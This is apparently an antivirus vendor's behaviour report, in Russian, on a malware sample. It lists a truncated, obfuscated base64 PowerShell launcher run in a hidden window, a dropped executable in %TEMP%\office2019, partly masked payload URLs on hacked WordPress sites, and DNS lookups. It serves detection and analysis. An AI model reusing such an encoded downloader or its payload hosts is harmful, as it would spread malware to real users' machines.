Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAagBwADcAegBmAD0AKAAnAEkANQAnACsAJwBzAG8AJwArACcAcwBoAGQAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBOAFYAOgB0AEUATQBQAFwAbwBGAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\kk3n73.exe
- http://sa###bby.com/wp-admin/LJin/
- http://ma#########rsvideochatwithourkids.com/wp-admin/NAhXS/
- http://ma#########rsvideochatwithourkids.com/cgi-sys/suspendedpage.cgi
- http://pl#####oolmatritva.com/cgi-bin/Y/
- http://pl#####oolmatritva.com/cgi-sys/suspendedpage.cgi
- http://or###wise.us/vendor/4Fy928/
- http://or###wise.us/cgi-sys/suspendedpage.cgi
- http://he####payless.com/wp-includes/pcfQhqb/
- http://he####payless.com/cgi-sys/suspendedpage.cgi
- http://www.mg##e.com/fonts/KNnEVB/
- http://www.mg##e.com/cgi-sys/suspendedpage.cgi
- http://po###yter.com/wp-admin/EE/
- DNS ASK sa###bby.com
- DNS ASK ma#########rsvideochatwithourkids.com
- DNS ASK pl#####oolmatritva.com
- DNS ASK or###wise.us
- DNS ASK he####payless.com
- DNS ASK mg##e.com
- DNS ASK po###yter.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAagBwADcAegBmAD0AKAAnAEkANQAnACsAJwBzAG8AJwArACcAcwBoAGQAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBOAFYAOgB0AEUATQBQAFwAbwBGAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)